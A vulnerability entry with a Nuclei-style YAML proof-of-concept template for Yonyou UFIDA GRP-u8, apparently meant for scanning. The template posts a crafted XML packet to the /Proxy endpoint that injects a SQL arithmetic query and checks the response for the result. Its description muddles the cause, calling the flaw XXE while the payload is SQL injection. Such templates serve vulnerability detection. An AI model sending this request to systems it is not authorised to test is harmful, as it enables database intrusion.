漏洞描述
UFIDA GRP-u8 has an XXE vulnerability. This vulnerability is caused by the application not loading external entities when parsing XML input, resulting in the loading of external SQL statements and command execution.
yonyou-grp-u8-xxe: Yonyou UFIDA GRP-u8 - XXE
PoC代码[已公开]
id: yonyou-grp-u8-xxe
info:
name: Yonyou UFIDA GRP-u8 - XXE
author: SleepingBag945
severity: critical
description: UFIDA GRP-u8 has an XXE vulnerability. This vulnerability is caused by the application not loading external entities when parsing XML input, resulting in the loading of external SQL statements and command execution.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
metadata:
max-request: 1
tags: yonyou,grp,xxe,sqli,vuln
variables:
num1: "{{rand_int(800000, 999999)}}"
num2: "{{rand_int(800000, 999999)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
POST /Proxy HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{num1}}%2a{{num2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{result}}"
- type: word
words:
- "<R9PACKET>"
# digest: 4a0a00473045022100f71f62ab613b77ce08de213482e9c0cd80f0f9f39f955bcba45af13ccb546aa702207923a19fea8368d4c216139337ec8d67e08dd464be408c130f4af0d83cb29bbb:922c64590222798bb761d5b6d8e72950